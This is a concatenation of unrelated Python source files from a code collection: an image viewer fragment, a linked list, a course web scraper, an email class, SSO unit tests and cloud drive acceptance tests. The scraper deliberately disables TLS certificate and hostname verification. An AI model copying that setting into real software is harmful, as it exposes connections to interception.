    if position <= 1:
        load_archive(archive_index - 1)
        load_next_image()
    else:
        position -= 1
        try:
            a = iter(archive.Archive(archives[archive_index]))
        except archive.core.Error:
            # This is really bad :/
            # Skip to next archive.
            load_archive(archive_index + 1)
        # Read forward to the entry at the (decremented) position.
        element = a.__next__()
        for i in range(1, position):
            element = a.__next__()
        buff = element.read()
        if len(buff) > 0:
            load_image(buff, element.filename)
        else:
            # Skip zero-length entries by stepping back once more.
            load_prev_image()
# Load the first image of the archive.
load_next_image()
# The callbacks we need for pyglet.
@window.event
def on_draw():
    # Redraw: clear the window and blit the current sprite, if any.
    window.clear()
    if img is not None:
        img.draw()
@window.event
def on_key_press(symbol, modifiers):
    """Keyboard navigation: q/Escape quits, Left steps back, any other
    key advances to the next image."""
    # 'q' or escape exit.
    if symbol == pyglet.window.key.Q or symbol == pyglet.window.key.ESCAPE:
        sys.exit(0)
    # Left gets the previous image.
    elif symbol == pyglet.window.key.LEFT:
        load_prev_image()
    # All other keys go to the next image.
    else:
        load_next_image()
# Go! Enter the pyglet event loop (blocks until exit).
pyglet.app.run()
| 2.953125 | 3 |
stack/doubly_linked_list.py | Oyekunle-Mark/tangled-mystery | 0 | 12769655 | <gh_stars>0
from typing import TypeVar, Generic, Optional, Any, Union
T = TypeVar('T')


class ListNode(Generic[T]):
    """Each ListNode holds a reference to its previous node
    as well as its next node in the List."""

    def __init__(self, value: T, prev: Optional[Any] = None, next: Optional[Any] = None) -> None:
        self.value = value
        self.prev = prev
        self.next = next

    def insert_after(self, value: T) -> None:
        """Wrap the given value in a ListNode and insert it
        after this node. Note that this node could already
        have a next node it is point to."""
        current_next = self.next
        self.next = ListNode(value, self, current_next)
        if current_next:
            current_next.prev = self.next

    def insert_before(self, value: T) -> None:
        """Wrap the given value in a ListNode and insert it
        before this node. Note that this node could already
        have a previous node it is point to."""
        current_prev = self.prev
        self.prev = ListNode(value, current_prev, self)
        if current_prev:
            current_prev.next = self.prev

    def delete(self) -> None:
        """Rearranges this ListNode's previous and next pointers
        accordingly, effectively deleting this ListNode."""
        if self.prev:
            self.prev.next = self.next
        if self.next:
            self.next.prev = self.prev


class DoublyLinkedList(Generic[T]):
    """Our doubly-linked list class. It holds references to
    the list's head and tail nodes."""

    def __init__(self, node: Optional[ListNode] = None):
        self.head = node
        self.tail = node
        self.length = 1 if node is not None else 0

    def __len__(self) -> int:
        return self.length

    def add_to_head(self, value: T) -> None:
        """Wraps the given value in a ListNode and inserts it
        as the new head of the list. Don't forget to handle
        the old head node's previous pointer accordingly."""
        new_node = ListNode(value)
        if not self.head and not self.tail:
            # Empty list: the single node is both head and tail.
            self.head = self.tail = new_node
        else:
            new_node.next = self.head
            self.head.prev = new_node
            self.head = new_node
        self.length += 1

    def remove_from_head(self) -> Optional[T]:
        """Removes the List's current head node, making the
        current head's next node the new head of the List.
        Returns the value of the removed Node (None if empty)."""
        if not self.head and not self.tail:
            return None
        removed_node_value = self.head.value
        if self.head is self.tail:
            # Single-element list becomes empty.
            self.head = self.tail = None
        else:
            removed_node = self.head
            self.head = self.head.next
            removed_node.delete()
        self.length -= 1
        return removed_node_value

    def add_to_tail(self, value: T) -> None:
        """Wraps the given value in a ListNode and inserts it
        as the new tail of the list. Don't forget to handle
        the old tail node's next pointer accordingly."""
        new_node = ListNode(value)
        if not self.head and not self.tail:
            self.head = self.tail = new_node
        else:
            new_node.prev = self.tail
            self.tail.next = new_node
            self.tail = new_node
        self.length += 1

    def remove_from_tail(self) -> Optional[T]:
        """Removes the List's current tail node, making the
        current tail's previous node the new tail of the List.
        Returns the value of the removed Node (None if empty)."""
        if not self.head and not self.tail:
            return None
        removed_node_value = self.tail.value
        if self.head is self.tail:
            self.head = self.tail = None
        else:
            removed_node = self.tail
            self.tail = self.tail.prev
            removed_node.delete()
        self.length -= 1
        return removed_node_value

    def move_to_front(self, node: ListNode) -> None:
        """Removes the input node from its current spot in the
        List and inserts it as the new head node of the List."""
        # Identity comparison for consistency with the other methods.
        if node is self.head:
            return
        node_value = node.value
        if node is self.tail:
            self.remove_from_tail()
        else:
            node.delete()
            self.length -= 1
        self.add_to_head(node_value)

    def move_to_end(self, node: ListNode) -> None:
        """Removes the input node from its current spot in the
        List and inserts it as the new tail node of the List."""
        if node is self.tail:
            return
        node_value = node.value
        if node is self.head:
            self.remove_from_head()
        else:
            node.delete()
            self.length -= 1
        self.add_to_tail(node_value)

    def delete(self, node: ListNode) -> None:
        """Removes a node from the list and handles cases where
        the node was the head or the tail."""
        if node is self.head:
            self.remove_from_head()
        elif node is self.tail:
            self.remove_from_tail()
        else:
            node.delete()
            self.length -= 1

    def get_max(self) -> Union[None, T]:
        """Returns the highest value currently in the list
        (None if the list is empty)."""
        if not self.head:
            return None
        current_max_value = self.head.value
        current_node = self.head
        while current_node:
            if current_node.value > current_max_value:
                current_max_value = current_node.value
            current_node = current_node.next
        return current_max_value
| 3.609375 | 4 |
py4e103/w4.e12.graded2.py | markhorsfield/py4e101 | 0 | 12769656 | <reponame>markhorsfield/py4e101<gh_stars>0
#!/usr/bin/python3
# In this assignment you will write a Python program that
# expands on https://www.py4e.com/code3/urllinks.py.
#
# The program will use urllib to read the HTML from the data files below,
# extract the href= values from the anchor tags,
# scan for a tag that is in a particular position from the top
# and follow that link, repeat the process a number of times,
# and report the last name you find.
import urllib.request, urllib.parse, urllib.error
from bs4 import BeautifulSoup
import ssl
ctx = ssl.create_default_context()
# Disable certificate verification -- the course data server does not
# always present a valid certificate.  (Not safe for production use.)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
# test
# Sequence of names: <NAME>
#url = 'http://py4e-data.dr-chuck.net/known_by_Fikret.html'
#repeat = 4
#position = 3
# Assignment input: start URL, number of hops to make, and the 1-based
# position of the link to follow at each hop.
url = 'http://py4e-data.dr-chuck.net/known_by_Jensyn.html'
repeat = 7
position = 18
# Follow the link chain `repeat` times, printing the name at each hop.
for i in range(repeat) :
    html = urllib.request.urlopen(url, context=ctx).read()
    soup = BeautifulSoup(html, "html.parser")
    # Retrieve all of the anchor tags
    tags = soup('a')
    count = 0
    for tag in tags:
        count += 1
        # Stop once the tag at `position` has been processed; its href
        # becomes the next URL to fetch.
        if count > position :
            break
        url = tag.get('href', None)
        #print('Name:', tag.contents[0])
        name = tag.contents[0]
    print(name)
| 3.953125 | 4 |
class EmailAddress:
    """A validated email address with user/domain accessors."""

    def __init__(self, email):
        # Assigning through the property validates and caches the split.
        self.email = email

    def __str__(self):
        return self.email

    def __repr__(self):
        return f"{EmailAddress.__name__}('{self.email}')"

    @property
    def email(self):
        """The full address as a string."""
        return self._email

    @email.setter
    def email(self, email):
        """Validate and store *email*; raises ValueError if malformed."""
        self._email = str(email)
        if not self._is_valid():
            raise ValueError(f'{self.email} is not a valid email address')
        # Bug fix: keep the cached (user, domain) split in sync on every
        # assignment.  Previously it was only computed in __init__, so
        # user/domain went stale after `obj.email = ...`.
        self._email_tpl = tuple(self._email.split('@'))

    @property
    def user(self):
        """The local part (everything before the '@')."""
        return self._email_tpl[0]

    @property
    def domain(self):
        """The domain part (everything after the '@')."""
        return self._email_tpl[1]

    def _is_valid(self):
        """Minimal sanity check: exactly one '@' and a dotted domain."""
        email_split = self._email.split('@')
        if len(email_split) != 2:
            return False
        domain_split = email_split[1].split('.')
        if len(domain_split) < 2:
            return False
        return True
| 3.46875 | 3 |
plaster/run/lnfit/lnfit_params.py | zack-erisyon/plaster_v1 | 0 | 12769658 | <reponame>zack-erisyon/plaster_v1<filename>plaster/run/lnfit/lnfit_params.py<gh_stars>0
from munch import Munch
from plaster.tools.schema.schema import Schema as s, Params
class LNFitParams(Params):
    """Parameter container for the lognormal-fit (lnfit) run stage.

    Declarative only: ``defaults`` supplies fallback values and ``schema``
    declares the accepted keyword arguments (presumably validated by the
    ``Params`` base class — confirm against plaster's schema tooling).
    """
    # Fallback values used when the caller omits these keys.
    defaults = Munch(photometry_only=False)
    # dye_on_threshold: int — intensity cutoff for calling a dye "on".
    # photometry_only: bool — when True, skip fitting (photometry only).
    # lognormal_fitter_v2_params: str — opaque parameter string passed
    #   through to the v2 fitter (format defined by the fitter itself).
    schema = s(
        s.is_kws_r(
            dye_on_threshold=s.is_int(),
            photometry_only=s.is_bool(),
            lognormal_fitter_v2_params=s.is_str(),
        )
    )
| 1.804688 | 2 |
# python/osr/osr_getprojectionmethods_test.py
#!/usr/bin/env python
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This is a complete rewrite of a file licensed as follows:
#
# Copyright (c) 2009, <NAME> <even dot rouault at mines dash paris dot org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
"""Test of get projection methods.
Rewrite of
http://trac.osgeo.org/gdal/browser/trunk/autotest/osr/osr_getprojectionmethods.py
"""
import unittest
from osgeo import osr
import unittest
class OsrGetProjectionMethods(unittest.TestCase):

  def testGetProj01TransverseMercator(self):
    """Spot-check that well-known projection methods are reported."""
    method_names = [method[0] for method in osr.GetProjectionMethods()]
    # Random sampling of what is available.
    expected = (
        'Transverse_Mercator',
        'Azimuthal_Equidistant',
        'Eckert_VI',
        'Oblique_Stereographic',
        'Orthographic',
    )
    for projection in expected:
      self.assertIn(projection, method_names)
# Allow running this test module directly from the command line.
if __name__ == '__main__':
  unittest.main()
| 1.703125 | 2 |
"""nith_results package metadata."""

# Package version string.
__version__ = '0.0.1'
# Canonical module name used elsewhere in the project.
__mod_name__ = 'nith_results'
| 1.015625 | 1 |
# tests/test_sso.py
# Copyright 2015 INFN
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
SSO Application tests
"""
from flask import url_for
import pytest
from urlparse import urlparse
from werkzeug.exceptions import BadRequest, Forbidden
from discourseSSO import sso
app = sso.app
class Test_sso():
    """Tests for the Discourse SSO payload check and user authorization.

    Each test builds a Flask test request context against the ``sso`` app
    and asserts on the redirect/error behaviour of the view functions.
    The base64 ``sso`` payloads and HMAC ``sig`` values are precomputed
    fixtures matching the app's configured secret.
    """
    def test_payload_check(self):
        """Test the payload is properly managed and the user is sent to the
        authentication page
        """
        with app.test_request_context('/sso/login?sso=bm9uY2U9Y2I2ODI1MWVlZm'
                                      'I1MjExZTU4YzAwZmYxMzk1ZjBjMGI%3D%0A&'
                                      'sig=2828aa29899722b35a2f191d34ef9b3ce'
                                      '695e0e6eeec47deb46d588d70c7cb56',
                                      method='GET'):
            res = sso.payload_check()
            # A valid signed payload redirects (302) to the authz endpoint.
            assert res.status_code == 302
            assert urlparse(res.location).path == url_for('user_authz')
    def test_bad_payload_sig(self):
        """Test the error code 400 is sent if the signature do not match
        the payload
        """
        with app.test_request_context('/sso/login?sso=bm9uY2U9Y2I2ODI1MWVlZm'
                                      'I1MjExZTU4YzAwZmYxMzk1ZjBjMGI%3D%0A&'
                                      'sig=2828aa29899722b35a2f191d34ef9b3ce'
                                      '695e0e6eeec47deb46d588d70c7cb58',
                                      method='GET'):
            with pytest.raises(BadRequest):
                sso.payload_check()
    def test_no_payload(self):
        """Test the error code 400 is sent if the sso field is not provided"""
        with app.test_request_context('/sso/login?sig=2828aa29899722b35a2f191'
                                      'd34ef9b3ce695e0e6eeec47deb46d588d70c7c'
                                      'b56',
                                      method='GET'):
            with pytest.raises(BadRequest):
                sso.payload_check()
    def test_no_hash(self):
        """Test the error code 400 is sent if the sig field is not provided"""
        with app.test_request_context('/sso/login?sso=bm9uY2U9Y2I2ODI1MWVlZm'
                                      'I1MjExZTU4YzAwZmYxMzk1ZjBjMGI%3D%0A&',
                                      method='GET'):
            with pytest.raises(BadRequest):
                sso.payload_check()
    def test_authentication_no_shibboleth_attributes(self):
        """Test the authentication when shibboleth do not provide attributes"""
        with app.test_request_context('/sso/auth',
                                      method='GET'):
            with pytest.raises(Forbidden):
                sso.user_authz()
    def test_authentication_no_previous_session(self):
        """Test the authentication are properly send to Discourse"""
        # Shibboleth attributes are present, but no nonce was stored in the
        # session by a prior /sso/login call, so access must be forbidden.
        with app.test_request_context('/sso/auth',
                                      method='GET',
                                      environ_base={
                                          'givenName': 'sam',
                                          'sn': '',
                                          'username': 'samsam',
                                          'mail': '<EMAIL>',
                                          'eppn': 'hello123'}
                                      ):
            with pytest.raises(Forbidden):
                sso.user_authz()
    def test_authentication_generation(self):
        """Test the authentication are properly send to Discourse"""
        with app.test_request_context('/sso/auth',
                                      method='GET',
                                      environ_base={
                                          'givenName': 'sam',
                                          'sn': '',
                                          'username': 'samsam',
                                          'mail': '<EMAIL>',
                                          'eppn': 'hello123'}
                                      ) as req:
            req.session['nonce'] = 'nonce=cb68251eefb5211e58c00ff1395f0c0b'
            resp = sso.user_authz()
            assert resp.status_code == 302
            # sso and sig are different from the one reported in
            # https://meta.discourse.org/t/official-single-sign-on-for-
            # discourse/13045
            # This because ruby and python include new lines in different
            # positions during the base64 encoding (of course they do not
            # matter for the base64 but the following URLencoding and
            # signature are slightly different)
            assert resp.location == ('http://discuss.example.com/session/'
                                     'sso_login?sso=bm9uY2U9Y2I2ODI1MWVlZ'
                                     'mI1MjExZTU4YzAwZmYxMzk1ZjBjMGImbmFt'
                                     'ZT1zYW0mdXNlcm5hbWU9%0Ac2Ftc2FtJmVt'
                                     'YWlsPXRlc3QlNDB0ZXN0LmNvbSZleHRlcm5'
                                     'hbF9pZD1oZWxsbzEyMyZhZG1pbj1m%0AYWx'
                                     'zZQ%3D%3D%0A&sig=a8ad52d665ddf2d2d5'
                                     '5de5d08d745f46d44a503d0b51b0273dd95'
                                     'e1f2abe1cbd')
    def test_authentication_generation_with_full_name(self):
        """Test the authentication are properly send to Discourse"""
        # No 'username' attribute: the app derives one from the full name.
        with app.test_request_context('/sso/auth',
                                      method='GET',
                                      environ_base={
                                          'givenName': 'sam',
                                          'sn': 'big',
                                          'mail': '<EMAIL>',
                                          'eppn': 'hello123'}
                                      ) as req:
            req.session['nonce'] = 'nonce=cb68251eefb5211e58c00ff1395f0c0b'
            resp = sso.user_authz()
            assert resp.status_code == 302
            assert resp.location == ('http://discuss.example.com/session/'
                                     'sso_login?sso=bm9uY2U9Y2I2ODI1MWVlZ'
                                     'mI1MjExZTU4YzAwZmYxMzk1ZjBjMGImbmFt'
                                     'ZT1zYW0gYmlnJnVzZXJu%0AYW1lPXNhbWJp'
                                     'Z19iNjQyJmVtYWlsPXRlc3QlNDB0ZXN0LmN'
                                     'vbSZleHRlcm5hbF9pZD1oZWxsbzEy%0AMyZ'
                                     'hZG1pbj1mYWxzZQ%3D%3D%0A&sig=8177ae'
                                     '45c294212a96767cfb2208db867a14fa099'
                                     '0bf7efb2f36dcac41d563e8')
    def test_authentication_generation_with_avatar_bio(self):
        """Test the authentication are properly send to Discourse"""
        # avatar/profile attributes flow through as avatar_url/bio fields.
        with app.test_request_context('/sso/auth',
                                      method='GET',
                                      environ_base={
                                          'givenName': 'sam',
                                          'sn': '',
                                          'username': 'samsam',
                                          'mail': '<EMAIL>',
                                          'eppn': 'hello123',
                                          'avatar': 'http://myAvatarURL',
                                          'profile': 'http://myProfileURL'}
                                      ) as req:
            req.session['nonce'] = 'nonce=cb68251eefb5211e58c00ff1395f0c0b'
            resp = sso.user_authz()
            assert resp.status_code == 302
            # sso and sig are different from the one reported in
            # https://meta.discourse.org/t/official-single-sign-on-for-
            # discourse/13045
            # This because ruby and python include new lines in different
            # positions during the base64 encoding (of course they do not
            # matter for the base64 but the following URLencoding and
            # signature are slightly different)
            assert resp.location == ('http://discuss.example.com/session/'
                                     'sso_login?sso=bm9uY2U9Y2I2ODI1MWVlZ'
                                     'mI1MjExZTU4YzAwZmYxMzk1ZjBjMGImbmFt'
                                     'ZT1zYW0mdXNlcm5hbWU9%0Ac2Ftc2FtJmVt'
                                     'YWlsPXRlc3QlNDB0ZXN0LmNvbSZleHRlcm5'
                                     'hbF9pZD1oZWxsbzEyMyZhdmF0YXJf%0AdXJ'
                                     'sPWh0dHAlM0EvL215QXZhdGFyVVJMJmJpbz'
                                     '1odHRwJTNBLy9teVByb2ZpbGVVUkwmYWRta'
                                     'W49%0AZmFsc2U%3D%0A&sig=61504842b6a'
                                     '130d0f2d6976de814313a8df539d5e95bd9'
                                     '32d693acbcf0b9df14')
    def test_authentication_generation_with_flags(self):
        """Test the authentication are properly send to Discourse"""
        # An email-shaped eppn additionally triggers require_activation.
        with app.test_request_context('/sso/auth',
                                      method='GET',
                                      environ_base={
                                          'givenName': 'sam',
                                          'sn': '',
                                          'username': 'samsam',
                                          'mail': '<EMAIL>',
                                          'eppn': '<EMAIL>',
                                          'avatar': 'http://myAvatarURL',
                                          'profile': 'http://myProfileURL'}
                                      ) as req:
            req.session['nonce'] = 'nonce=cb68251eefb5211e58c00ff1395f0c0b'
            resp = sso.user_authz()
            assert resp.status_code == 302
            # sso and sig are different from the one reported in
            # https://meta.discourse.org/t/official-single-sign-on-for-
            # discourse/13045
            # This because ruby and python include new lines in different
            # positions during the base64 encoding (of course they do not
            # matter for the base64 but the following URLencoding and
            # signature are slightly different)
            assert resp.location == ('http://discuss.example.com/session/'
                                     'sso_login?sso=bm9uY2U9Y2I2ODI1MWVlZ'
                                     'mI1MjExZTU4YzAwZmYxMzk1ZjBjMGImbmFt'
                                     'ZT1zYW0mdXNlcm5hbWU9%0Ac2Ftc2FtJmVt'
                                     'YWlsPXRlc3QlNDB0ZXN0LmNvbSZleHRlcm5'
                                     'hbF9pZD1teS5uYW1lJTQwbXkuaWRw%0AJmF'
                                     '2YXRhcl91cmw9aHR0cCUzQS8vbXlBdmF0YX'
                                     'JVUkwmYmlvPWh0dHAlM0EvL215UHJvZmlsZ'
                                     'VVS%0ATCZhZG1pbj1mYWxzZSZyZXF1aXJlX'
                                     '2FjdGl2YXRpb249ZmFsc2U%3D%0A&sig=26'
                                     '8beaa221824d9c5ec9df3cb85e0655e86e1'
                                     'ba49ce516155f3f2557d7340140')
    def test_error_page_403(self):
        """Test the correct error code is propagated"""
        with app.test_request_context('/sso/auth',
                                      method='GET',
                                      environ_base={
                                          'givenName': 'sam',
                                          'sn': '',
                                          'username': 'samsam',
                                          'mail': '<EMAIL>',
                                          'eppn': 'hello123'}
                                      ):
            # NOTE(review): function name is spelled 'attribuete_not_provided'
            # in the application module — presumably a typo there; verify
            # before renaming anything.
            resp = sso.attribuete_not_provided(None)
            assert resp[1] == 403
# src/testing/acceptance/test_drives.py
from multiprocessing import Process, Queue
import os
import struct
import tempfile
import unittest
import random
from logging import getLogger
from nose.plugins.attrib import attr
from past.builtins import basestring
import cloudsigma.resource as cr
import cloudsigma.errors as errors
from testing.utils import DumpResponse
from testing.acceptance.common import StatefulResourceTestBase
LOG = getLogger(__name__)
@attr('acceptance_test')
class DriveBasicTest(StatefulResourceTestBase):
    """Acceptance tests for the basic drive lifecycle against the live API:
    create/get/update/delete, resize, listing, editing, cloning, avoidance
    and schema retrieval.  Methods tagged ``docs_snippets`` also capture the
    raw API responses as documentation examples via DumpResponse.
    """
    def setUp(self):
        super(DriveBasicTest, self).setUp()
        self.client = cr.Drive()
        # Context manager that records raw API responses for the docs.
        self.dump_response = DumpResponse(clients=[self.client])
    @attr('docs_snippets')
    def test_drive_cycle(self):
        """Create a drive, update its metadata, then delete it."""
        drive_def = {
            'name': 'test_drive_1',
            'size': 1024000000,
            'media': 'disk',
        }
        with self.dump_response('drive_create_minimal'):
            drive = self.client.create(drive_def)
        drive_uuid = drive['uuid']
        # A freshly created drive starts in 'creating' and settles in
        # 'unmounted' once provisioning finishes.
        self.assertEqual(drive['status'], 'creating')
        self._wait_for_status(drive_uuid, 'unmounted')
        with self.dump_response('drive_get_unmounted'):
            drive = self.client.get(drive_uuid)
        with self.dump_response('drive_update_meta'):
            drive['meta'] = {
                'meta_key1': 'value',
                'meta_key2': 'value\nwith\nnew lines'
            }
            updated_drive = self.client.update(drive_uuid, drive)
        self.assertEqual(drive['meta'], updated_drive['meta'])
        with self.dump_response('drive_delete'):
            self.client.delete(drive_uuid)
        self._wait_deleted(drive_uuid)
    @attr('docs_snippets')
    def test_drive_resize(self):
        """Resize a drive via update(), including a non-aligned odd size."""
        DRIVE_CREATE_SIZE = 2 * 1024 ** 3
        drive_def = {
            'name': 'test_drive_1',
            'size': DRIVE_CREATE_SIZE,
            'media': 'disk',
        }
        drive = self.client.create(drive_def)
        self.assertEqual(drive['status'], 'creating')
        self._wait_for_status(
            drive['uuid'],
            'unmounted',
            timeout=self.TIMEOUT_DRIVE_CREATED
        )
        DRIVE_NEW_SIZE = DRIVE_CREATE_SIZE + 3 * 1024 ** 3
        with self.dump_response('drive_resize'):
            drive_def['size'] = DRIVE_NEW_SIZE
            resizing_drive = self.client.update(drive['uuid'], drive_def)
        self.assertEqual(resizing_drive['status'], 'resizing')
        self._wait_for_status(resizing_drive['uuid'], 'unmounted')
        resized_drive = self.client.get(drive['uuid'])
        self.assertEqual(
            int(resized_drive['size']),
            DRIVE_NEW_SIZE,
            'Size mismatch after drive resize'
        )
        # Odd (non block-aligned) sizes get rounded by the backend; only
        # require the result to be within the allowed rounding window.
        DRIVE_NEW_ODD_SIZE = DRIVE_NEW_SIZE + 1*1024**3 + 7*1024**2 + 3*1024
        drive_def['size'] = DRIVE_NEW_ODD_SIZE
        resizing_drive = self.client.update(drive['uuid'], drive_def)
        self.assertEqual(resizing_drive['status'], 'resizing')
        self._wait_for_status(resizing_drive['uuid'], 'unmounted')
        ALLOWED_SIZE_ROUNDING = 64 * 1024
        resized_drive = self.client.get(drive['uuid'])
        self.assertNotEqual(
            int(resized_drive['size']),
            DRIVE_NEW_SIZE,
            'Size of {!r} did not change'.format(drive['uuid'])
        )
        self.assertLess(
            abs(DRIVE_NEW_ODD_SIZE-int(resized_drive['size'])),
            ALLOWED_SIZE_ROUNDING,
            'New size differs with more than %d bytes, requested size %d '
            'bytes, reported size after resize %d bytes' % (
                ALLOWED_SIZE_ROUNDING,
                DRIVE_NEW_ODD_SIZE,
                resized_drive['size']
            )
        )
        self.client.delete(drive['uuid'])
        self._wait_deleted(drive['uuid'])
    @attr('docs_snippets')
    def test_drive_resize_action(self):
        """Resize a drive via the dedicated resize() action endpoint."""
        DRIVE_CREATE_SIZE = 2 * 1024 ** 3
        drive_def = {
            'name': 'test_drive_1',
            'size': DRIVE_CREATE_SIZE,
            'media': 'disk',
        }
        drive = self.client.create(drive_def)
        self._wait_for_status(
            drive['uuid'],
            'unmounted',
            timeout=self.TIMEOUT_DRIVE_CREATED
        )
        drive['size'] = 2 * drive['size']
        with self.dump_response('drive_resize_action'):
            self.client.resize(drive['uuid'], drive)
        self._wait_for_status(
            drive['uuid'],
            'unmounted',
            timeout=self.TIMEOUT_DRIVE_CREATED
        )
        resized_drive = self.client.get(drive['uuid'])
        self.assertEqual(resized_drive['size'], drive['size'])
        self.client.delete(drive['uuid'])
        self._wait_deleted(drive['uuid'])
    @attr('docs_snippets')
    def test_drive_listing(self):
        """Exercise bulk create plus short, field-filtered and detail lists."""
        req = [
            {
                'name': 'test_drive_%i' % i,
                'size': '1024000000',
                'media': 'disk',
            } for i in range(5)
        ]
        with self.dump_response('drive_create_bulk'):
            drives = self.client.create(req)
        for drive in drives:
            self._wait_for_status(drive['uuid'], 'unmounted')
        # Get the short list of fields
        with self.dump_response('drive_list'):
            self.client.list()
        # Get just a list of uuids
        with self.dump_response('drive_list_just_uuid_and_status'):
            just_uuids = self.client.list(query_params={'fields':'uuid,status'})
        for el in just_uuids:
            self.assertEqual(set(el.keys()), {'uuid', 'status'})
        # Get detailed information on drives
        with self.dump_response('drive_list_detail'):
            self.client.list_detail()
        for drive in drives:
            self.client.delete(drive['uuid'])
        for drive in drives:
            self._wait_deleted(drive['uuid'])
    @attr('docs_snippets')
    def test_drive_edit(self):
        """Rename a drive and switch its media type via update()."""
        drive_def = {
            'name': 'test_drive_x',
            'size': 1024000000,
            'media': 'disk',
        }
        drive = self.client.create(drive_def)
        self._wait_for_status(drive['uuid'], 'unmounted')
        drive_def['name'] = 'test_drive_y'
        drive_def['media'] = 'cdrom'
        with self.dump_response('drive_edit'):
            updated_drive = self.client.update(drive['uuid'], drive_def)
        self.assertDictContainsSubset(drive_def, updated_drive)
        self.client.delete(updated_drive['uuid'])
        self._wait_deleted(updated_drive['uuid'])
    @attr('docs_snippets')
    def test_drive_clone(self):
        """Clone a drive, overriding name/media/affinities on the clone."""
        drive_def = {
            'name': 'test_drive_x',
            'size': '1024000000',
            'media': 'disk',
        }
        drive = self.client.create(drive_def)
        self._wait_for_status(
            drive['uuid'],
            'unmounted',
            timeout=self.TIMEOUT_DRIVE_CLONING
        )
        clone_drive_def = {
            'name': 'test_drive_y',
            'media': 'cdrom',
            'affinities': [],
        }
        with self.dump_response('drive_clone'):
            cloned_drive = self.client.clone(drive['uuid'], clone_drive_def)
        self._wait_for_status(
            cloned_drive['uuid'],
            'unmounted',
            timeout=self.TIMEOUT_DRIVE_CLONING
        )
        self.client.delete(drive['uuid'])
        self.client.delete(cloned_drive['uuid'])
        self._wait_deleted(cloned_drive['uuid'], timeout=60)
        self._wait_deleted(drive['uuid'], timeout=60)
    def test_drive_avoid(self):
        """Clone/create with an 'avoid' hint so drives land on other hosts."""
        drive_def = {
            'name': 'test_drive_x',
            'size': '1024000000',
            'media': 'disk',
        }
        drive = self.client.create(drive_def)
        self._wait_for_status(
            drive['uuid'],
            'unmounted',
            timeout=self.TIMEOUT_DRIVE_CLONING
        )
        clone_drive_def = {
            'name': 'test_drive_y',
            'media': 'cdrom',
            'affinities': [],
        }
        cloned_drive = self.client.clone(
            drive['uuid'],
            clone_drive_def,
            avoid=drive['uuid']
        )
        another_drive = self.client.create(drive_def, avoid=drive['uuid'])
        self._wait_for_status(
            cloned_drive['uuid'],
            'unmounted',
            timeout=self.TIMEOUT_DRIVE_CLONING
        )
        self._wait_for_status(
            another_drive['uuid'],
            'unmounted',
            timeout=self.TIMEOUT_DRIVE_CLONING
        )
        self.client.delete(drive['uuid'])
        self.client.delete(cloned_drive['uuid'])
        self.client.delete(another_drive['uuid'])
        self._wait_deleted(cloned_drive['uuid'], timeout=60)
        self._wait_deleted(drive['uuid'], timeout=60)
        self._wait_deleted(another_drive['uuid'], timeout=60)
    @attr('docs_snippets')
    def test_get_schema(self):
        """Fetch the drive JSON schema (captured as a docs snippet)."""
        with self.dump_response('drive_schema'):
            self.client.get_schema()
@attr('acceptance_test')
class LibraryDriveTest(StatefulResourceTestBase):
    """Acceptance tests for library (public) drives: listing, fetching and
    attaching library images to guests.
    """

    def _gen_server_definition(self, drives=(), changed_def=None):
        """Build a server definition dict for the guest-creation API.

        :param drives: iterable of drive attachments; each item may be a
            ready-made attachment dict, or a drive UUID string which gets
            wrapped in a default virtio attachment. Anything else is
            silently skipped (same as the original behaviour).
        :param changed_def: optional mapping of overrides merged into the
            base server definition before drives are appended.
        :return: the assembled server definition dict.

        Fixes: the mutable default arguments (``[]``/``{}``) and the
        confusing ``drive = list.append(drive)`` None-assignment trick of
        the previous implementation.
        """
        drive_template = {
            "device": "virtio",
            "dev_channel": "0:0",
            "drive": None,
            "boot_order": 1
        }
        server_def = {
            'name': 'testServerAcc',
            'cpu': 1000,
            'mem': 512 * 1024 ** 2,
            'vnc_password': '<PASSWORD>',
            'drives': [],
        }
        server_def.update(changed_def or {})
        for drive in drives:
            if isinstance(drive, dict):
                server_def['drives'].append(drive)
            elif isinstance(drive, basestring):
                # A bare UUID string: wrap it in the default attachment.
                attachment = dict(drive_template, drive=drive)
                server_def['drives'].append(attachment)
            # Unsupported item types are ignored.
        return server_def

    def setUp(self):
        super(LibraryDriveTest, self).setUp()
        self.client = cr.LibDrive()
        # Records raw API responses as documentation snippets.
        self.dump_response = DumpResponse(clients=[self.client])

    @attr('docs_snippets')
    def test_get_schema(self):
        """Fetch the library-drive JSON schema (captured as a snippet)."""
        with self.dump_response('libdrive_schema'):
            self.client.get_schema()

    @attr('docs_snippets')
    def test_libdrive_listing(self):
        """List library drives and fetch one both via the libdrive and the
        regular drive endpoint, asserting they agree.
        """
        with self.dump_response('libdrive_list'):
            libdrives = self.client.list(query_params={'limit': 5})

